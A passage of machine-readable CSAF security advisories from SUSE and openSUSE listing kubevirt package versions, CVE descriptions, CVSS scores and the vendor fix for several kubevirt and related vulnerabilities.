"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container",
"tracking": {
"current_release_date": "2025-12-09T11:33:55Z",
"generator": {
"date": "2025-12-09T11:33:55Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:4330-1",
"initial_release_date": "2025-12-09T11:33:55Z",
"revision_history": [
{
"date": "2025-12-09T11:33:55Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-containers:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64"
},
"product_reference": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64"
},
"product_reference": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64"
},
"product_reference": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to versions 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failure to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance could exploit the shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances, potentially compromising the integrity and availability of the VMs they manage. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher), thus compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker must be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
OPENSUSE-SU-2026:20281-1
Vulnerability from csaf_opensuse - Published: 2026-02-27 08:51 - Updated: 2026-02-27 08:51
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt fixes the following issues:\n\nUpdate to version 1.7.0 (bsc#1257128).\n\nSecurity issues fixed:\n\n - CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially cause a DoS\n (bsc#1253189).\n - CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into\n creating empty files/directories on the host (bsc#1257422).\n - CVE-2025-22872: incorrectly interpreted tags can cause content to be placed in the wrong scope during DOM construction\n (bsc#1241772).\n - CVE-2025-64432: failure to correctly validate certain fields in the client TLS certificate may allow an attacker to\n bypass existing RBAC controls (bsc#1253181).\n - CVE-2025-64433: improper symlink handling can allow reading arbitrary files (bsc#1253185).\n - CVE-2025-64434: compromising a virt-handler instance can lead to impersonation of 